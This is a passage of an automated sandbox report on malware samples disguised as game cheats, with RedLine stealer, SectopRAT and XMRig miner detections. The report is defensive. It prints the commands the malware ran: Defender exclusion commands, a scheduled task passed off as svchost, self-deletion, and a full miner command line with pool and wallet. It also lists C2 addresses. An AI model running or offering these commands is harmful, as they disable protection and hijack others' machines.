| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosInformation | C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer | C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemProductName | C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Logical Unit Id 0 | C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe
"C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip4.seeip.org | udp |
| US | 23.128.64.141:443 | ip4.seeip.org | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.137.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.208.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp |
Files
memory/2720-0-0x00007FFDD2E43000-0x00007FFDD2E45000-memory.dmp
memory/2720-1-0x00000000007C0000-0x00000000007D0000-memory.dmp
memory/2720-2-0x00007FFDD2E40000-0x00007FFDD3901000-memory.dmp
memory/2720-3-0x00007FFDD2E43000-0x00007FFDD2E45000-memory.dmp
memory/2720-4-0x00007FFDD2E40000-0x00007FFDD3901000-memory.dmp
memory/2720-8-0x000000001BB20000-0x000000001BB50000-memory.dmp
memory/2720-9-0x00007FFDD2E40000-0x00007FFDD3901000-memory.dmp
Analysis: behavioral26
Detonation Overview
Submitted
2024-11-09 16:28
Reported
2024-11-09 16:31
Platform
win10v2004-20241007-en
Max time kernel
138s
Max time network
150s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sectoprat family
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2204 set thread context of 2844 | N/A | C:\Users\Admin\AppData\Local\Temp\launcher.exe | C:\Users\Admin\AppData\Local\Temp\launcher.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\launcher.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\launcher.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\launcher.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
C:\Users\Admin\AppData\Local\Temp\launcher.exe
C:\Users\Admin\AppData\Local\Temp\launcher.exe
C:\Users\Admin\AppData\Local\Temp\launcher.exe
C:\Users\Admin\AppData\Local\Temp\launcher.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| DE | 3.68.106.170:59223 | tcp | |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| DE | 3.68.106.170:59223 | tcp | |
| US | 8.8.8.8:53 | 98.209.201.84.in-addr.arpa | udp |
| DE | 3.68.106.170:59223 | tcp | |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| DE | 3.68.106.170:59223 | tcp | |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| DE | 3.68.106.170:59223 | tcp | |
| DE | 3.68.106.170:59223 | tcp |
Files
memory/2204-0-0x000000007444E000-0x000000007444F000-memory.dmp
memory/2204-1-0x0000000000230000-0x0000000000294000-memory.dmp
memory/2204-2-0x0000000004C10000-0x0000000004C86000-memory.dmp
memory/2204-3-0x00000000026D0000-0x00000000026EE000-memory.dmp
memory/2204-4-0x0000000074440000-0x0000000074BF0000-memory.dmp
memory/2204-5-0x0000000005440000-0x00000000059E4000-memory.dmp
memory/2844-6-0x0000000000400000-0x000000000041E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\launcher.exe.log
| MD5 | e5352797047ad2c91b83e933b24fbc4f |
| SHA1 | 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772 |
| SHA256 | b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c |
| SHA512 | dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827 |
memory/2844-9-0x0000000074440000-0x0000000074BF0000-memory.dmp
memory/2844-12-0x0000000005780000-0x0000000005792000-memory.dmp
memory/2844-11-0x0000000005D30000-0x0000000006348000-memory.dmp
memory/2204-10-0x0000000074440000-0x0000000074BF0000-memory.dmp
memory/2844-13-0x00000000057E0000-0x000000000581C000-memory.dmp
memory/2844-14-0x0000000005820000-0x000000000586C000-memory.dmp
memory/2844-15-0x0000000074440000-0x0000000074BF0000-memory.dmp
memory/2844-16-0x0000000005A90000-0x0000000005B9A000-memory.dmp
memory/2844-17-0x0000000074440000-0x0000000074BF0000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-11-09 16:28
Reported
2024-11-09 16:31
Platform
win10v2004-20241007-en
Max time kernel
141s
Max time network
150s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Install.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Install.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| NL | 45.14.49.109:54819 | tcp | |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| NL | 45.14.49.109:54819 | tcp | |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.209.201.84.in-addr.arpa | udp |
| NL | 45.14.49.109:54819 | tcp | |
| NL | 45.14.49.109:54819 | tcp | |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| NL | 45.14.49.109:54819 | tcp | |
| NL | 45.14.49.109:54819 | tcp |
Files
memory/4648-1-0x0000000002EF0000-0x0000000002FF0000-memory.dmp
memory/4648-2-0x0000000002E30000-0x0000000002E5F000-memory.dmp
memory/4648-3-0x0000000000400000-0x0000000000432000-memory.dmp
memory/4648-4-0x0000000004B80000-0x0000000004BA2000-memory.dmp
memory/4648-5-0x00000000073B0000-0x0000000007954000-memory.dmp
memory/4648-6-0x0000000007360000-0x0000000007380000-memory.dmp
memory/4648-7-0x0000000000400000-0x0000000002C86000-memory.dmp
memory/4648-8-0x0000000007960000-0x0000000007F78000-memory.dmp
memory/4648-10-0x0000000008020000-0x000000000805C000-memory.dmp
memory/4648-9-0x0000000008000000-0x0000000008012000-memory.dmp
memory/4648-11-0x0000000008080000-0x00000000080CC000-memory.dmp
memory/4648-12-0x0000000008210000-0x000000000831A000-memory.dmp
memory/4648-13-0x0000000002EF0000-0x0000000002FF0000-memory.dmp
memory/4648-15-0x0000000002E30000-0x0000000002E5F000-memory.dmp
memory/4648-16-0x0000000000400000-0x0000000000432000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-11-09 16:28
Reported
2024-11-09 16:31
Platform
win10v2004-20241007-en
Max time kernel
147s
Max time network
152s
Command Line
Signatures
Xmrig family
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4932 set thread context of 4880 | N/A | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | C:\Windows\System32\svchost.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe
"C:\Users\Admin\AppData\Local\Temp\CSGhost-v4.1.exe"
C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe
"C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe"
C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\svchost64.exe
C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"'
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\svchost64.exe
C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"' & exit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Local\Temp\svchost.exe"'
C:\Windows\System32\svchost.exe
C:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-us-east1.nanopool.org:14444 --user=448F1xWYd98Rsot8PEiA5FNbcX7h9ZNRcT6Kt41uAoUF4BrDE3Ph3YQ3ojownLCTrC4J1Bomr6LzrCTopwmq1fq33FrUvqJ --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=90 --cinit-stealth
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sanctam.net | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr-us-east1.nanopool.org | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| CA | 51.79.71.77:14444 | xmr-us-east1.nanopool.org | tcp |
| US | 8.8.8.8:53 | 77.71.79.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
Files
memory/4444-0-0x0000000074852000-0x0000000074853000-memory.dmp
memory/4444-1-0x0000000074850000-0x0000000074E01000-memory.dmp
memory/4444-2-0x0000000074850000-0x0000000074E01000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\CSGhost-v4.1.exe
| MD5 | 56a7502c31f7e8b9df6026cca035d000 |
| SHA1 | a2e1dea33bec675650559a148f78f831a0c11886 |
| SHA256 | b6dffd0fcf337c0da1439857c9bb162c1965641e644163f702f29bc84fd04b9f |
| SHA512 | 82b2331d087d0543ef5004d59206f618db7ad91225b4720b302c7da2263972cadebc8412a3fa85262c993bfab5247cfa4cfea01d80ea4cbeb59c0ef7fbebe499 |
C:\Users\Admin\AppData\Local\Temp\5B16A34E-6DCE-499C-B1A2-57ED884BE32F\svchost.exe
| MD5 | 164b5610097d3c76850d0d3cc1f3892a |
| SHA1 | 31c439c5dab3c0a98ca827a07e17f903b8aae2f9 |
| SHA256 | e922d71f77061f2ce7100d4f1aea67b8477d7e9cd9e40a10a411868cf93bbc52 |
| SHA512 | fa832118802c3b4107911a541e8498a6c3acd1fba50c3e0a115899d521a77e293325397296d00353abd6d10965dc74b8fea1ee58dafa6547f05c76bd6e64450e |
memory/4444-26-0x0000000074850000-0x0000000074E01000-memory.dmp
memory/4992-27-0x00007FF8ABE33000-0x00007FF8ABE35000-memory.dmp
memory/4992-25-0x0000000000E30000-0x0000000000E40000-memory.dmp
memory/1964-32-0x000001E37E590000-0x000001E37E5B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i1ub5fzm.2nw.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6d3e9c29fe44e90aae6ed30ccf799ca8 |
| SHA1 | c7974ef72264bbdf13a2793ccf1aed11bc565dce |
| SHA256 | 2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d |
| SHA512 | 60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | eb1ad317bd25b55b2bbdce8a28a74a94 |
| SHA1 | 98a3978be4d10d62e7411946474579ee5bdc5ea6 |
| SHA256 | 9e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98 |
| SHA512 | d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 22310ad6749d8cc38284aa616efcd100 |
| SHA1 | 440ef4a0a53bfa7c83fe84326a1dff4326dcb515 |
| SHA256 | 55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf |
| SHA512 | 2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def |
C:\Users\Admin\AppData\Local\Temp\svchost64.exe
| MD5 | a5bdb33481f19152370a4cbe486c1790 |
| SHA1 | d657448275485590e0b141bc3965f03650636e47 |
| SHA256 | ead94cc9778691b1388fc31b4a9ec1bb1220073508e80228bd85d325612d7075 |
| SHA512 | 61612206312611b2026e8a38a4b1f18a24fb8605e75bd2fe26d4132a6a4ab890e4096d8eb96e5f2cfc312885451f156ef6e56bd00943e1745ad532bbfef3d0fe |
memory/1844-79-0x0000000000AD0000-0x0000000000ADE000-memory.dmp
memory/1844-80-0x0000000001490000-0x00000000014A2000-memory.dmp
memory/1844-81-0x0000000001D00000-0x0000000001D0A000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log
| MD5 | 28d7fcc2b910da5e67ebb99451a5f598 |
| SHA1 | a5bf77a53eda1208f4f37d09d82da0b9915a6747 |
| SHA256 | 2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c |
| SHA512 | 2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 34f595487e6bfd1d11c7de88ee50356a |
| SHA1 | 4caad088c15766cc0fa1f42009260e9a02f953bb |
| SHA256 | 0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d |
| SHA512 | 10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e69c5554cfe965e000e33ee9f1cd88d5 |
| SHA1 | ef74e8e9a0113870c87ece51d4e86040b1eeecdc |
| SHA256 | 712c2be9f3cff2c74ba7c7cd92208f724c8862277dd8b4f6f2605cc50fb4fdd0 |
| SHA512 | 6a8e64e11df3fa1aa32f95387f3b43d2ed6f4c996db8cee9110586e4bb9eba604550235b6fa6a41beb6fcc31339cb969a6e79d3fcf1f7d42dcd4655cfee38a16 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cb0cf19ebeba3256a05065693a1ca866 |
| SHA1 | c028aff9b6850c2bdd6673b74037630b4ee2ccd8 |
| SHA256 | 58e1183323526c135119df281171285d98b5ce05ad00f201ca899cd43358e3fb |
| SHA512 | 811606a0c8545eac53127a3687c6b0fde595dd7e958ef11ae650d142d40ac5e86ebbd313dc17dfa86c091ee868dc1c9ed422c2e541c6de3487e0c50c1a3e8fbc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 83685d101174171875b4a603a6c2a35c |
| SHA1 | 37be24f7c4525e17fa18dbd004186be3a9209017 |
| SHA256 | 0c557845aab1da497bbff0e8fbe65cabf4cb2804b97ba8ae8c695a528af70870 |
| SHA512 | 005a97a8e07b1840abdcef86a7881fd9bdc8acbfdf3eafe1dceb6374060626d81d789e57d87ca4096a39e28d5cca00f8945edff0a747591691ae75873d2b3fb5 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost64.exe.log
| MD5 | 23867f73ff39fa0dfee6cfb5d3d176ab |
| SHA1 | 8705a09d38e5f0b034a6f4b4deb5817e312204e1 |
